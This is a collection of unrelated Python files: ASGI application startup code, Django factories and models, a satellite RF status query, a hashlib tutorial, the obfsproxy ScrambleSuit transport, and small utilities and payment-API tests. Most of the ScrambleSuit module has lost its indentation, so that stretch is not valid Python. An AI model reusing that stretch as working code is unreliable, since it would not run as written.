        # with activated instances of controllers; still supports custom
        # and generic decorators (*args, **kwargs);
        # as long as `functools.wraps` decorator is used in those decorators.
        self.register_controllers(self.prepare_controllers())

    def get_controller_handler_pattern(
        self, controller_type: Type, route: RegisteredRoute
    ) -> bytes:
        """
        Returns the full pattern to be used for a route handler,
        defined as controller method.
        """
        base_route = getattr(controller_type, "route", None)
        if base_route is not None:
            if callable(base_route):
                value = base_route()
            elif isinstance(base_route, (str, bytes)):
                value = base_route
            else:
                raise RuntimeError(
                    f"Invalid controller `route` attribute. "
                    f"Controller `{controller_type.__name__}` "
                    f"has an invalid route attribute: it should "
                    f"be callable, or str, or bytes."
                )
            if value:
                return ensure_bytes(join_fragments(value, route.pattern))
        return ensure_bytes(route.pattern)

    def prepare_controllers(self) -> List[Type]:
        """
        Adds controller routes to the application's router and returns the
        list of controller types found in the controllers registry.
        """
        controller_types = []
        for route in self.controllers_router:
            handler = route.handler
            controller_type = getattr(handler, "controller_type")
            controller_types.append(controller_type)
            # annotate `self` so the binder activates a controller instance
            handler.__annotations__["self"] = ControllerParameter[controller_type]
            self.router.add(
                route.method,
                self.get_controller_handler_pattern(controller_type, route),
                handler,
            )
        return controller_types

    def bind_controller_type(self, controller_type: Type):
        """Assigns shared resources (templating) to a controller type, if any."""
        templates_environment = getattr(self, "templates_environment", None)
        if templates_environment:
            setattr(controller_type, "templates", templates_environment)

    def register_controllers(self, controller_types: List[Type]):
        """
        Registers controller types as transient services
        in the application service container.
        """
        if not controller_types:
            return
        if not isinstance(self.services, Container):
            raise RequiresServiceContainerError(
                "When using controllers, the application.services must be "
                "a service `Container` (`rodi.Container`; not a built service "
                "provider)."
            )
        for controller_class in controller_types:
            if controller_class in self.services:
                continue
            self.bind_controller_type(controller_class)
            # TODO: maybe rodi should be modified to handle the following
            # internally;
            # if a type does not define an __init__ method, then a fair
            # assumption is that it can be instantiated
            # by calling it;
            # TODO: the following if statement can be removed if rodi is
            # modified as described above.
            if getattr(controller_class, "__init__") is object.__init__:
                self.services.add_transient_by_factory(
                    controller_class, controller_class
                )
            else:
                self.services.add_exact_transient(controller_class)

    def normalize_handlers(self):
        """Normalizes all route handlers once, after routes are sorted."""
        # Track handlers shared by several routes so each is normalized once.
        configured_handlers = set()
        self.router.sort_routes()
        for route in self.router:
            if route.handler in configured_handlers:
                continue
            route.handler = normalize_handler(route, self.service_provider)
            configured_handlers.add(route.handler)
        configured_handlers.clear()

    def configure_middlewares(self):
        """
        Configures the final middlewares chain (idempotent). Insertion order
        at index 0 makes default headers outermost, then authentication,
        then authorization, then any user middlewares.
        """
        if self._middlewares_configured:
            return
        self._middlewares_configured = True
        if self._authorization_strategy:
            if not self._authentication_strategy:
                raise AuthorizationWithoutAuthenticationError()
            self.middlewares.insert(
                0, get_authorization_middleware(self._authorization_strategy)
            )
        if self._authentication_strategy:
            self.middlewares.insert(
                0, get_authentication_middleware(self._authentication_strategy)
            )
        if self._default_headers:
            self.middlewares.insert(
                0, get_default_headers_middleware(self._default_headers)
            )
        self._normalize_middlewares()
        if self.middlewares:
            self._apply_middlewares_in_routes()

    def build_services(self):
        """Builds the service provider from the configured services."""
        self._service_provider = self.services.build_provider()

    async def start(self):
        """
        Starts the application: fires on_start, registers controllers, builds
        services, normalizes handlers, configures middlewares, then fires
        after_start. No-op if already started.
        """
        if self.started:
            return
        self.started = True
        if self.on_start:
            await self.on_start.fire()
        self.use_controllers()
        self.build_services()
        self.normalize_handlers()
        self.configure_middlewares()
        if self.after_start:
            await self.after_start.fire()

    async def stop(self):
        """Fires the on_stop event and marks the application as stopped."""
        await self.on_stop.fire()
        self.started = False

    async def _handle_lifespan(self, receive, send):
        """Handles the ASGI lifespan protocol (startup/shutdown messages)."""
        message = await receive()
        assert message["type"] == "lifespan.startup"
        try:
            await self.start()
        except:  # NOQA
            logging.exception("Startup error")
            await send({"type": "lifespan.startup.failed"})
            return
        await send({"type": "lifespan.startup.complete"})
        message = await receive()
        assert message["type"] == "lifespan.shutdown"
        await self.stop()
        await send({"type": "lifespan.shutdown.complete"})

    async def __call__(self, scope, receive, send):
        """ASGI entry point: dispatches lifespan and HTTP scopes."""
        if scope["type"] == "lifespan":
            return await self._handle_lifespan(receive, send)
        assert scope["type"] == "http"
        request = Request.incoming(
            scope["method"], scope["raw_path"], scope["query_string"], scope["headers"]
        )
        request.scope = scope
        request.content = ASGIContent(receive)
        response = await self.handle(request)
        await send_asgi_response(response, send)
        request.scope = None  # type: ignore
        request.content.dispose()
|
import datetime
import factory
from kawaz.core.personas.tests.factories import PersonaFactory
from ..models import Event
class EventFactory(factory.DjangoModelFactory):
    """Factory producing `Event` model fixtures with sample Japanese data.

    NOTE(review): `FACTORY_FOR` is the legacy factory_boy (< 2.4) declaration
    style; current releases expect `class Meta: model = Event`. Confirm the
    pinned factory_boy version before modernising.
    """
    FACTORY_FOR = Event
    pub_state = 'public'
    title = '焼肉食べまくる会'
    # Event runs from one hour to four hours from "now".
    # NOTE(review): datetime.datetime.now() is naive; if the Event model uses
    # timezone-aware fields (Django USE_TZ), these should be aware -- verify.
    period_start = factory.LazyAttribute(lambda o: datetime.datetime.now() + datetime.timedelta(hours=1))
    period_end = factory.LazyAttribute(lambda o: datetime.datetime.now() + datetime.timedelta(hours=4))
    place = 'すすきの周辺'
    organizer = factory.SubFactory(PersonaFactory)
|
from Util.LoggingHelper import log_info_message
from datetime import datetime
async def get_reaction_wheel_status(rf_controller):
    """Query the reaction-wheel status over the RF link and print the result.

    Sends command 7, then polls for a response: 71 means the wheels are
    running, 70 means they are stopped; any other value is treated as a
    timeout and command 5200 is sent before polling again. Exceptions are
    caught and printed rather than propagated.
    """
    try:
        log_info_message('Sending Get Reaction Wheel Command')
        await rf_controller.send(7)
        waiting = True
        while waiting:
            print('Waiting for response...')
            reply = await rf_controller.get_response(10)
            if reply == 71:
                print('Reaction Wheels are Running')
                waiting = False
            elif reply == 70:
                print('Reaction Wheels are not running')
                waiting = False
            else:
                print('Timed out - Retrying')
                await rf_controller.send(5200)
    except Exception as e:
        print('Error: ' + str(e))
"""
不可逆加密
hashlib模块简介:
hashlib模块为不同的安全哈希/安全散列(Secure Hash Algorithm)和 信息摘要算法(Message Digest Algorithm)
实现了一个公共的、通用的接口,也可以说是一个统一的入口。
因为hashlib模块不仅仅是整合了md5和sha模块的功能,
还提供了对更多中算法的函数实现,
如:MD5,SHA1,SHA224,SHA256,SHA384和SHA512。
hashlib模块使用步骤:
1)获取一个哈希算法对应的哈希对象(比如名称为hash):
可以通过 hashlib.new(哈希算法名称, 初始出入信息)函数,来获取这个哈希对象,
如hashlib.new('MD5', 'Hello'),hashlib.new('SHA1', 'Hello')等;
也可以通过hashlib.哈希算法名称()来获取这个哈希对象,
如hashlib.md5(), hashlib.sha1()等。
2)设置/追加输入信息:
调用已得到哈希对象的update(输入信息)方法可以设置或追加输入信息,
多次调用该方法,等价于把每次传递的参数凭借后进行作为一个参数垫底给update()方法。
也就是说,多次调用是累加,而不是覆盖。
3)获取输入信息对应的摘要:
调用已得到的哈希对象的digest()方法或hexdigest()方法即可得到传递给update()方法的字符串参数的摘要信息。
digest()方法返回的摘要信息是一个二进制格式的字符串,
其中可能包含非ASCII字符,包括NUL字节,该字符串长度可以通过哈希对象的digest_size属性获取;
而hexdigest()方法返回的摘要信息是一个16进制格式的字符串,
该字符串中只包含16进制的数字,且长度是digest()返回结果长度的2倍,
这可用邮件的安全交互或其它非二进制的环境中。
"""
#!/usr/bin/env python
# coding=utf-8
__author__ = 'Luzhuo'
__date__ = '2017/5/19'
# hash_demo.py Hash加密相关(安全哈希)
# 支持: MD5, SHA1 SHA224 SHA256 SHA384 SHA512
import hashlib
def hash_demo():
    """Demonstrate basic hashlib usage: incremental MD5, SHA3-512, and PBKDF2."""
    digest = hashlib.md5()
    # Successive update() calls accumulate input: this hashes b"helloworld!".
    digest.update(b"hello")
    digest.update(b"world!")
    hash_hex = hashlib.sha3_512(b"luzhuo.me").hexdigest()
    print(digest.digest_size)
    print(digest.digest())     # raw binary digest
    print(digest.hexdigest())  # hex-encoded digest
    print(hash_hex)
    # Salted, iterated key derivation (PBKDF2-HMAC-SHA256).
    hash_bytes = hashlib.pbkdf2_hmac('sha256', b'luzhuo.me', b'80', 100000)
    print(hash_bytes)
def hash_func():
    """Reference tour of the hashlib API: constructors, constants, hash-object members."""
    # hashlib.new(name[, data]) -- create a hash object (not the preferred way);
    # name = algorithm name, data = initial input.
    # NOTE(review): 'ripemd160' is only available when the underlying OpenSSL
    # build provides it; this can raise ValueError on modern systems -- verify.
    hash = hashlib.new('ripemd160', b'luzhuo.me')
    # Constants
    dics = hashlib.algorithms_guaranteed # algorithm names supported on every platform
    dics = hashlib.algorithms_available # algorithm names usable in this interpreter; recognised by new()
    # hashlib.pbkdf2_hmac(hash_name, password, salt, iterations, dklen=None) // salted derivation; hash_name: hash name, password: data, salt: salt, iterations: iteration count, dklen: key length
    hash_bytes = hashlib.pbkdf2_hmac('sha256', b'luzhuo.me', b'80', 100000)
    # Hash-object attributes and methods
    num = hash.digest_size # size of the resulting digest
    num = hash.block_size # internal block size of the algorithm
    strs = hash.name # hash name, can be passed to new()
    hash.update(b"data") # byte buffer; hash.update(a) hash.update(b) == hash.update(a+b)
    hash_bytes = hash.digest() # digest as bytes
    hash_str = hash.hexdigest() # digest as a hex string
    hash = hash.copy() # copy of the hash object's state
if __name__ == "__main__":
    # Run the printing demo when executed as a script.
    hash_demo()
    # hash_func()
|
"""
The scramblesuit module implements the ScrambleSuit obfuscation protocol.
The paper discussing the design and evaluation of the ScrambleSuit pluggable
transport protocol is available here:
http://www.cs.kau.se/philwint/scramblesuit/
"""
from twisted.internet import reactor
import obfsproxy.transports.base as base
import obfsproxy.common.log as logging
import random
import base64
import yaml
import probdist
import mycrypto
import message
import const
import util
import packetmorpher
import ticket
import uniformdh
import state
import fifobuf
log = logging.get_obfslogger()
class ScrambleSuitTransport( base.BaseTransport ):
"""
Implement the ScrambleSuit protocol.
The class implements methods which implement the ScrambleSuit protocol. A
large part of the protocol's functionality is outsources to different
modules.
"""
def __init__( self ):
"""
Initialise a ScrambleSuitTransport object.
"""
log.error("\n\n################################################\n"
"Do NOT rely on ScrambleSuit for strong security!\n"
"################################################\n")
log.debug("Initialising %s." % const.TRANSPORT_NAME)
super(ScrambleSuitTransport, self).__init__()
# Load the server's persistent state from file.
if self.weAreServer:
self.srvState = state.load()
# Initialise the protocol's state machine.
log.debug("Switching to state ST_WAIT_FOR_AUTH.")
self.protoState = const.ST_WAIT_FOR_AUTH
# Buffer for outgoing data.
self.sendBuf = ""
# Buffer for inter-arrival time obfuscation.
self.choppingBuf = fifobuf.Buffer()
# AES instances to decrypt incoming and encrypt outgoing data.
self.sendCrypter = mycrypto.PayloadCrypter()
self.recvCrypter = mycrypto.PayloadCrypter()
# Packet morpher to modify the protocol's packet length distribution.
self.pktMorpher = packetmorpher.new(self.srvState.pktDist
if self.weAreServer else None)
# Inter-arrival time morpher to obfuscate inter arrival times.
self.iatMorpher = self.srvState.iatDist if self.weAreServer else \
probdist.new(lambda: random.random() %
const.MAX_PACKET_DELAY)
# Used to extract protocol messages from encrypted data.
self.protoMsg = message.MessageExtractor()
# Used by the server-side: `True' if the ticket is already
# decrypted but not yet authenticated.
self.decryptedTicket = False
# If we are in external mode we should already have a shared
# secret set up because of validate_external_mode_cli().
if self.weAreExternal:
assert(self.uniformDHSecret)
if self.weAreClient and not self.weAreExternal:
# As a client in managed mode, we get the shared secret
# from callback `handle_socks_args()' per-connection. Set
# the shared secret to None for now.
self.uniformDHSecret = None
self.uniformdh = uniformdh.new(self.uniformDHSecret, self.weAreServer)
@classmethod
def setup( cls, transportConfig ):
"""
Called once when obfsproxy starts.
"""
util.setStateLocation(transportConfig.getStateLocation())
cls.weAreClient = transportConfig.weAreClient
cls.weAreServer = not cls.weAreClient
cls.weAreExternal = transportConfig.weAreExternal
# If we are server and in managed mode, we should get the
# shared secret from the server transport options.
if cls.weAreServer and not cls.weAreExternal:
cfg = transportConfig.getServerTransportOptions()
if cfg and "password" in cfg:
cls.uniformDHSecret = base64.b32decode(util.sanitiseBase32(
cfg["password"]))
cls.uniformDHSecret = cls.uniformDHSecret.strip()
@classmethod
def get_public_server_options( cls, transportOptions ):
"""
Return ScrambleSuit's BridgeDB parameters, i.e., the shared secret.
As a fallback mechanism, we return an automatically generated password
if the bridge operator did not use `ServerTransportOptions'.
"""
log.debug("Tor's transport options: %s" % str(transportOptions))
if not "password" in transportOptions:
log.warning("No password found in transport options (use Tor's " \
"`ServerTransportOptions' to set your own password)." \
" Using automatically generated password instead.")
srv = state.load()
transportOptions = {"password":
base64.b32encode(srv.fallbackPassword)}
cls.uniformDHSecret = srv.fallbackPassword
return transportOptions
def deriveSecrets( self, masterKey ):
"""
Derive various session keys from the given `masterKey'.
The argument `masterKey' is used to derive two session keys and nonces
for AES-CTR and two HMAC keys. The derivation is done using
HKDF-SHA256.
"""
assert len(masterKey) == const.MASTER_KEY_LENGTH
log.debug("Deriving session keys from %d-byte master key." %
len(masterKey))
# We need key material for two symmetric AES-CTR keys, nonces and
# HMACs. In total, this equals 144 bytes of key material.
hkdf = mycrypto.HKDF_SHA256(masterKey, "", (32 * 4) + (8 * 2))
okm = hkdf.expand()
assert len(okm) >= ((32 * 4) + (8 * 2))
# Set AES-CTR keys and nonces for our two AES instances.
self.sendCrypter.setSessionKey(okm[0:32], okm[32:40])
self.recvCrypter.setSessionKey(okm[40:72], okm[72:80])
# Set the keys for the two HMACs protecting our data integrity.
self.sendHMAC = okm[80:112]
self.recvHMAC = okm[112:144]
if self.weAreServer:
self.sendHMAC, self.recvHMAC = self.recvHMAC, self.sendHMAC
self.sendCrypter, self.recvCrypter = self.recvCrypter, \
self.sendCrypter
def circuitConnected( self ):
"""
Initiate a ScrambleSuit handshake.
This method is only relevant for clients since servers never initiate
handshakes. If a session ticket is available, it is redeemed.
Otherwise, a UniformDH handshake is conducted.
"""
# The server handles the handshake passively.
if self.weAreServer:
return
# The preferred authentication mechanism is a session ticket.
bridge = self.circuit.downstream.transport.getPeer()
storedTicket = ticket.findStoredTicket(bridge)
if storedTicket is not None:
log.debug("Redeeming stored session ticket.")
(masterKey, rawTicket) = storedTicket
self.deriveSecrets(masterKey)
self.circuit.downstream.write(ticket.createTicketMessage(rawTicket,
self.sendHMAC))
# We switch to ST_CONNECTED opportunistically since we don't know
# yet whether the server accepted the ticket.
log.debug("Switching to state ST_CONNECTED.")
self.protoState = const.ST_CONNECTED
self.flushSendBuffer()
# Conduct an authenticated UniformDH handshake if there's no ticket.
else:
log.debug("No session ticket to redeem. Running UniformDH.")
self.circuit.downstream.write(self.uniformdh.createHandshake())
def sendRemote( self, data, flags=const.FLAG_PAYLOAD ):
"""
Send data to the remote end after a connection was established.
The given `data' is first encapsulated in protocol messages. Then, the
protocol message(s) are sent over the wire. The argument `flags'
specifies the protocol message flags with the default flags signalling
payload.
"""
log.debug("Processing %d bytes of outgoing data." % len(data))
# Wrap the application's data in ScrambleSuit protocol messages.
messages = message.createProtocolMessages(data, flags=flags)
# Let the packet morpher tell us how much we should pad.
paddingLen = self.pktMorpher.calcPadding(sum([len(msg) for
msg in messages]))
# If padding > header length, a single message will do...
if paddingLen > const.HDR_LENGTH:
messages.append(message.new("", paddingLen=paddingLen -
const.HDR_LENGTH))
# ...otherwise, we use two padding-only messages.
else:
messages.append(message.new("", paddingLen=const.MPU -
const.HDR_LENGTH))
messages.append(message.new("", paddingLen=paddingLen))
blurb = "".join([msg.encryptAndHMAC(self.sendCrypter,
self.sendHMAC) for msg in messages])
# Flush data chunk for chunk to obfuscate inter arrival times.
if const.USE_IAT_OBFUSCATION:
if len(self.choppingBuf) == 0:
self.choppingBuf.write(blurb)
reactor.callLater(self.iatMorpher.randomSample(),
self.flushPieces)
else:
# flushPieces() is still busy processing the chopping buffer.
self.choppingBuf.write(blurb)
else:
self.circuit.downstream.write(blurb)
def flushPieces( self ):
"""
Write the application data in chunks to the wire.
The cached data is sent over the wire in chunks. After every write
call, control is given back to the Twisted reactor so it has a chance
to flush the data. Shortly thereafter, this function is called again
to write the next chunk of data. The delays in between subsequent
write calls are controlled by the inter-arrival time obfuscator.
"""
# Drain and send an MTU-sized chunk from the chopping buffer.
if len(self.choppingBuf) > const.MTU:
self.circuit.downstream.write(self.choppingBuf.read(const.MTU))
# Drain and send whatever is left in the output buffer.
else:
self.circuit.downstream.write(self.choppingBuf.read())
return
reactor.callLater(self.iatMorpher.randomSample(), self.flushPieces)
def processMessages( self, data ):
"""
Acts on extracted protocol messages based on header flags.
After the incoming `data' is decrypted and authenticated, this method
processes the received data based on the header flags. Payload is
written to the local application, new tickets are stored, or keys are
added to the replay table.
"""
if (data is None) or (len(data) == 0):
return
# Try to extract protocol messages from the encrypted blurb.
msgs = self.protoMsg.extract(data, self.recvCrypter, self.recvHMAC)
if (msgs is None) or (len(msgs) == 0):
return
for msg in msgs:
# Forward data to the application.
if msg.flags == const.FLAG_PAYLOAD:
self.circuit.upstream.write(msg.payload)
# Store newly received ticket.
elif self.weAreClient and (msg.flags == const.FLAG_NEW_TICKET):
assert len(msg.payload) == (const.TICKET_LENGTH +
const.MASTER_KEY_LENGTH)
peer = self.circuit.downstream.transport.getPeer()
ticket.storeNewTicket(msg.payload[0:const.MASTER_KEY_LENGTH],
msg.payload[const.MASTER_KEY_LENGTH:
const.MASTER_KEY_LENGTH +
const.TICKET_LENGTH], peer)
# Use the PRNG seed to generate the same probability distributions
# as the server. That's where the polymorphism comes from.
elif self.weAreClient and (msg.flags == const.FLAG_PRNG_SEED):
assert len(msg.payload) == const.PRNG_SEED_LENGTH
log.debug("Obtained PRNG seed.")
prng = random.Random(msg.payload)
pktDist = probdist.new(lambda: prng.randint(const.HDR_LENGTH,
const.MTU),
seed=msg.payload)
self.pktMorpher = packetmorpher.new(pktDist)
self.iatMorpher = probdist.new(lambda: prng.random() %
const.MAX_PACKET_DELAY,
seed=msg.payload)
else:
log.warning("Invalid message flags: %d." % msg.flags)
def flushSendBuffer( self ):
"""
Flush the application's queued data.
The application could have sent data while we were busy authenticating
the remote machine. This method flushes the data which could have been
queued in the meanwhile in `self.sendBuf'.
"""
if len(self.sendBuf) == 0:
log.debug("Send buffer is empty; nothing to flush.")
return
# Flush the buffered data, the application is so eager to send.
log.debug("Flushing %d bytes of buffered application data." %
len(self.sendBuf))
self.sendRemote(self.sendBuf)
self.sendBuf = ""
def receiveTicket( self, data ):
"""
Extract and verify a potential session ticket.
The given `data' is treated as a session ticket. The ticket is being
decrypted and authenticated (yes, in that order). If all these steps
succeed, `True' is returned. Otherwise, `False' is returned.
"""
if len(data) < (const.TICKET_LENGTH + const.MARK_LENGTH +
const.HMAC_SHA256_128_LENGTH):
return False
potentialTicket = data.peek()
# Now try to decrypt and parse the ticket. We need the master key
# inside to verify the HMAC in the next step.
if not self.decryptedTicket:
newTicket = ticket.decrypt(potentialTicket[:const.TICKET_LENGTH],
self.srvState)
if newTicket != None and newTicket.isValid():
self.deriveSecrets(newTicket.masterKey)
self.decryptedTicket = True
else:
return False
# First, find the mark to efficiently locate the HMAC.
mark = mycrypto.HMAC_SHA256_128(self.recvHMAC,
potentialTicket[:const.TICKET_LENGTH])
index = util.locateMark(mark, potentialTicket)
if not index:
return False
# Now, verify if the HMAC is valid.
existingHMAC = potentialTicket[index + const.MARK_LENGTH:
index + const.MARK_LENGTH +
const.HMAC_SHA256_128_LENGTH]
myHMAC = mycrypto.HMAC_SHA256_128(self.recvHMAC,
potentialTicket[0:
index + const.MARK_LENGTH] +
util.getEpoch())
if not util.isValidHMAC(myHMAC, existingHMAC, self.recvHMAC):
log.warning("The HMAC is invalid: `%s' vs. `%s'." %
(myHMAC.encode('hex'), existingHMAC.encode('hex')))
return False
# Do nothing if the ticket is replayed. Immediately closing the
# connection would be suspicious.
if self.srvState.isReplayed(existingHMAC):
log.warning("The HMAC was already present in the replay table.")
return False
data.drain(index + const.MARK_LENGTH + const.HMAC_SHA256_128_LENGTH)
log.debug("Adding the HMAC authenticating the ticket message to the " \
"replay table: %s." % existingHMAC.encode('hex'))
self.srvState.registerKey(existingHMAC)
log.debug("Switching to state ST_CONNECTED.")
self.protoState = const.ST_CONNECTED
return True
def receivedUpstream( self, data ):
"""
Sends data to the remote machine or queues it to be sent later.
Depending on the current protocol state, the given `data' is either
directly sent to the remote machine or queued. The buffer is then
flushed once, a connection is established.
"""
if self.protoState == const.ST_CONNECTED:
self.sendRemote(data.read())
# Buffer data we are not ready to transmit yet.
else:
self.sendBuf += data.read()
log.debug("Buffered %d bytes of outgoing data." %
len(self.sendBuf))
def sendTicketAndSeed( self ):
"""
Send a session ticket and the PRNG seed to the client.
This method is only called by the server after successful
authentication. Finally, the server's send buffer is flushed.
"""
log.debug("Sending a new session ticket and the PRNG seed to the " \
"client.")
self.sendRemote(ticket.issueTicketAndKey(self.srvState),
flags=const.FLAG_NEW_TICKET)
self.sendRemote(self.srvState.prngSeed,
flags=const.FLAG_PRNG_SEED)
self.flushSendBuffer()
def receivedDownstream( self, data ):
"""
Receives and processes data coming from the remote machine.
The incoming `data' is dispatched depending on the current protocol
state and whether we are the client or the server. The data is either
payload or authentication data.
"""
if self.weAreServer and (self.protoState == const.ST_WAIT_FOR_AUTH):
# First, try to interpret the incoming data as session ticket.
if self.receiveTicket(data):
log.debug("Ticket authentication succeeded.")
self.sendTicketAndSeed()
# Second, interpret the data as a UniformDH handshake.
elif self.uniformdh.receivePublicKey(data, self.deriveSecrets,
self.srvState):
# Now send the server's UniformDH public key to the client.
handshakeMsg = self.uniformdh.createHandshake()
log.debug("Sending %d bytes of UniformDH handshake and "
"session ticket." % len(handshakeMsg))
self.circuit.downstream.write(handshakeMsg)
log.debug("UniformDH authentication succeeded.")
log.debug("Switching to state ST_CONNECTED.")
self.protoState = const.ST_CONNECTED
self.sendTicketAndSeed()
else:
log.debug("Authentication unsuccessful so far. "
"Waiting for more data.")
return
elif self.weAreClient and (self.protoState == const.ST_WAIT_FOR_AUTH):
if not self.uniformdh.receivePublicKey(data, self.deriveSecrets):
log.debug("Unable to finish UniformDH handshake just yet.")
return
log.debug("UniformDH authentication succeeded.")
log.debug("Switching to state ST_CONNECTED.")
self.protoState = const.ST_CONNECTED
self.flushSendBuffer()
if self.protoState == const.ST_CONNECTED:
self.processMessages(data.read())
@classmethod
def register_external_mode_cli( cls, subparser ):
"""
Register a CLI arguments to pass a secret or ticket to ScrambleSuit.
Two options are made available over the command line interface: one to
specify a ticket file and one to specify a UniformDH shared secret.
"""
subparser.add_argument("--password",
required=True,
type=str,
help="Shared secret for UniformDH",
dest="uniformDHSecret")
super(ScrambleSuitTransport, cls).register_external_mode_cli(subparser)
@classmethod
def validate_external_mode_cli( cls, args ):
"""
Assign the given command line arguments to local variables.
"""
uniformDHSecret = None
try:
uniformDHSecret = base64.b32decode(util.sanitiseBase32(
args.uniformDHSecret))
except (TypeError, AttributeError) as error:
log.error(error.message)
raise base.PluggableTransportError(
"UniformDH password '%s' isn't valid base32!"
% args.uniformDHSecret)
parentalApproval = super(
ScrambleSuitTransport, cls).validate_external_mode_cli(args)
if not parentalApproval:
# XXX not very descriptive nor helpful, but the parent class only
# returns a boolean without telling us what's wrong.
raise base.PluggableTransportError(
"Pluggable Transport args invalid: %s" % args )
if uniformDHSecret:
rawLength = len(uniformDHSecret)
if rawLength != const.SHARED_SECRET_LENGTH:
raise base.PluggableTransportError(
"The UniformDH password must be %d bytes in length, ",
"but %d bytes are given."
% (const.SHARED_SECRET_LENGTH, rawLength))
else:
cls.uniformDHSecret = uniformDHSecret
def handle_socks_args( self, args ):
    """
    Receive arguments `args' passed over a SOCKS connection.

    The SOCKS authentication mechanism is (ab)used to pass arguments to
    pluggable transports.  This method receives these arguments and parses
    them.  As argument, we only expect a UniformDH shared secret.

    :param args: list of SOCKS argument strings; exactly one element of
        the form "password=<base32 secret>" is expected.
    :raises base.SOCKSArgsError: on wrong argument count or format.
    :raises base.PluggableTransportError: if the decoded secret has the
        wrong length.
    """

    log.debug("Received the following arguments over SOCKS: %s." % args)

    if len(args) != 1:
        raise base.SOCKSArgsError("Too many SOCKS arguments "
                                  "(expected 1 but got %d)." % len(args))

    # The ScrambleSuit specification defines that the shared secret is
    # called "password".
    if not args[0].startswith("password="):
        raise base.SOCKSArgsError("The SOCKS argument must start with "
                                  "`password='.")

    # A shared secret might already be set if obfsproxy is in external
    # mode.  The SOCKS-provided secret takes precedence.
    if self.uniformDHSecret:
        log.warning("A UniformDH password was already specified over "
                    "the command line. Using the SOCKS secret instead.")

    # NOTE(review): split('=')[1] drops anything after a second '=' —
    # base32 padding characters in the secret would be truncated; confirm
    # inputs are unpadded.
    self.uniformDHSecret = base64.b32decode(util.sanitiseBase32(
        args[0].split('=')[1].strip()))

    rawLength = len(self.uniformDHSecret)
    if rawLength != const.SHARED_SECRET_LENGTH:
        raise base.PluggableTransportError("The UniformDH password "
            "must be %d bytes in length but %d bytes are given." %
            (const.SHARED_SECRET_LENGTH, rawLength))

    # Re-create the handshake object with the freshly supplied secret.
    self.uniformdh = uniformdh.new(self.uniformDHSecret, self.weAreServer)
class ScrambleSuitClient( ScrambleSuitTransport ):

    """
    Client-side flavour of ScrambleSuit; behaviour lives in the parent.
    """

    def __init__( self ):
        """
        Initialise a ScrambleSuitClient object.
        """
        ScrambleSuitTransport.__init__(self)
class ScrambleSuitServer( ScrambleSuitTransport ):

    """
    Server-side flavour of ScrambleSuit; behaviour lives in the parent.
    """

    def __init__( self ):
        """
        Initialise a ScrambleSuitServer object.
        """
        ScrambleSuitTransport.__init__(self)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import datetime
import time
def print_time(func):
    """Decorator: print a timestamp before and after each call to *func*
    and return the wrapped function's result.

    Generalised from a fixed two-positional-argument wrapper to accept any
    positional/keyword arguments, and uses functools.wraps so the wrapped
    function keeps its name and docstring.  print() calls are valid on
    both Python 2 (single argument) and Python 3.
    """
    from functools import wraps

    @wraps(func)
    def wrapper(*args, **kwargs):
        print(datetime.datetime.now())  # timestamp before the call
        res = func(*args, **kwargs)
        print(datetime.datetime.now())  # timestamp after the call
        return res
    return wrapper
@print_time
def add(x, y):
    """Return x + y after a one-second delay (delay makes the printed
    before/after timestamps visibly differ)."""
    time.sleep(1)
    res = x + y
    return res

# Demonstration call: prints two timestamps roughly one second apart.
add(1, 2)
|
def palindromeRearranging(inputString):
    """Return True if the characters of *inputString* can be rearranged
    into a palindrome.

    A string is palindrome-rearrangeable iff at most one character occurs
    an odd number of times.

    BUG FIX: the previous shortcut `if sorted(s) == s and len(s) % 2 == 1:
    return True` wrongly accepted any already-sorted odd-length string
    (e.g. "abc"), not just single-character strings.

    :param inputString: string to test (empty string returns True).
    :return: bool
    """
    from collections import Counter
    odd_counts = sum(1 for count in Counter(inputString).values() if count % 2)
    return odd_counts <= 1
"""
a='madam'
b='racecar'
c='amanaplanacanalpanamarrrrff'
d='zzzz'
e='ppppp'
print(palindromeRearranging("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabc"))
"""
|
import starkbank
from unittest import TestCase, main
from starkcore.error import InputErrors
from tests.utils.user import exampleProject
starkbank.user = exampleProject
class TestDarfPaymentLogGet(TestCase):
    """Query DARF payment logs, then re-query filtered by the ids/types found."""

    def test_success(self):
        # First pass fetches up to 10 logs; second pass exercises the
        # payment_ids and types query filters using the values just seen.
        logs = list(starkbank.darfpayment.log.query(limit=10))
        logs = list(starkbank.darfpayment.log.query(limit=10, payment_ids={log.payment.id for log in logs}, types={log.type for log in logs}))
        for log in logs:
            print(log)
        print("Number of logs:", len(logs))
class TestDarfPaymentLogPage(TestCase):
    """Page through DARF payment logs, checking cursoring yields unique ids."""

    def test_success(self):
        cursor = None
        ids = []
        for _ in range(2):
            # Two pages of two logs each; a repeated id would mean broken
            # cursor pagination.
            logs, cursor = starkbank.darfpayment.log.page(limit=2, cursor=cursor)
            for log in logs:
                print(log)
                self.assertFalse(log.id in ids)
                ids.append(log.id)
            if cursor is None:
                break
        self.assertTrue(len(ids) == 4)
class TestDarfPaymentLogInfoGet(TestCase):
    """Fetch a single DARF payment log by id."""

    def test_success(self):
        logs = starkbank.darfpayment.log.query()
        log_id = next(logs).id
        # NOTE(review): the fetched log is unused — no assertion that it
        # matches log_id; the test only verifies the call does not raise.
        log = starkbank.darfpayment.log.get(log_id)
if __name__ == '__main__':
main()
|
def is_sequence(arg):
    """
    Check whether an argument is iterable, but not a string.

    BUG FIX: the previous form `not (A and (B or C))` returned True for
    non-iterable values such as integers (no `strip`, no `__iter__`); the
    `not` must apply only to the string check.

    :param arg: argument to check
    :return: True if the argument is a non-string, iterable.
    """
    return (not hasattr(arg, "strip") and
            (hasattr(arg, "__getitem__") or
             hasattr(arg, "__iter__")))
|
"""
Well Registry ORM object.
"""
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import RegexValidator
from django.db import models
from smart_selects.db_fields import ChainedForeignKey
class ArbitraryDecimalFields(models.DecimalField):
    """
    Subclass to implement arbitrary precision decimal field in Postgres.

    See https://steve.dignam.xyz/2019/10/24/arbitrary-precision-decimal-fields/
    """
    # The three _check_* overrides return no errors, silencing Django's
    # system checks that would otherwise require max_digits/decimal_places.
    def _check_decimal_places(self):
        return []

    def _check_max_digits(self):
        return []

    def _check_decimal_places_and_max_digits(self, **kwargs):
        return []

    def db_type(self, connection):
        # pg or bust: a bare "numeric" column (no precision) is
        # Postgres-specific, so refuse any other backend outright.
        assert connection.settings_dict["ENGINE"] == "django.db.backends.postgresql"
        return "numeric"
class AgencyLookup(models.Model):
    """Model definition for the agency table, lookup only"""
